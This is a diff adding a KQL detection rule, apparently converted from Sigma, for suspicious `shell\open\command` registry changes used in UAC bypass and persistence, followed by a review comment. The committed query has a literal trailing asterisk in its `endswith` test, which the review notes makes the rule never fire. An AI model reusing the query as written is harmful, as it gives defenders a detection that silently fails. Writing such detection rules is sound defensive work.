+// Title: Suspicious Shell Open Command Registry Modification
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2026-01-24
+// Level: medium
+// Description: Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence.
+// Generally, modifications to the `*\shell\open\command` registry key can indicate an attempt to change the default action for opening files,
+// and various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001
+// False Positives:
+// - Legitimate software installations or updates that modify the shell open command registry keys to these locations.
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\$Recycle.Bin\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Contacts\\" or RegistryValueData contains "\\Music\\" or RegistryValueData contains "\\PerfLogs\\" or RegistryValueData contains "\\Photos\\" or RegistryValueData contains "\\Pictures\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Videos\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%AppData%" or RegistryValueData contains "%LocalAppData%" or RegistryValueData contains "%Temp%" or RegistryValueData contains "%tmp%") and RegistryKey endswith "\\shell\\open\\command*"
\ No newline at end of file
diff --git a/sigma b/sigma
index 6fe7343b..d5188c36 160000
--- a/sigma
+++ b/sigma
@@ -1 +1 @@
-Subproject commit 6fe7343bf79306884b05837d5e03bcbcb141ce50
+Subproject commit d5188c36a1c19eb101194a9c263a8e3ce285aa1e
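Review bot: The `RegistryKey endswith "\\shell\\open\\command*"` test treats the trailing `*` as a literal character — KQL `endswith` has no wildcard syntax — so it only matches keys whose name literally ends in `command*`, which means the rule never fires. If the asterisk came from a Sigma wildcard meant to allow the value name after the key, the MDE equivalent is simply `RegistryKey endswith "\\shell\\open\\command"`, since the value being written (typically `(Default)` or `DelegateExecute`) is reported in `RegistryValueName` and nothing after `command` belongs in the key test. This looks like a converter issue rather than a hand-written mistake, so the other generated rules are worth grepping for a quoted `*` and the pipeline fixed as well.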
